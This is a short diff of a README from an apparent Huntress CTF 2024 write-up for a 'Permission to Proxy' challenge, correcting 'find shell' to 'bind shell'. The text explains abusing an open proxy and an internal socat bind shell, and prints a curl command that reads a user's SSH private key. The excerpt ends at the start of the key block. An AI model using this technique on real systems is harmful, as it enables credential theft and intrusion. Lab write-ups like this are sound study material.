JimKrolik/Huntress-CTF-2024-WriteUps/Miscellaneous/Permission to Proxy/README.md

 One of the files that stands out here is the ```.docker-entrypoint.sh``` file.

-From this, it looks we have a socat find shell sitting on the other side on port 50000 and it's running as the user "user".
+From this, it looks we have a socat bind shell sitting on the other side on port 50000 and it's running as the user "user".
 Let's abuse this knowledge and search for an SSH key.
 A quick curl to ```curl -x http://challenge.ctf.games:32611 http://127.0.0.1:50000/home/user/.ssh/id_rsa``` gives us the following private key:

 ```
 -----BEGIN OPENSSH PRIVATE KEY-----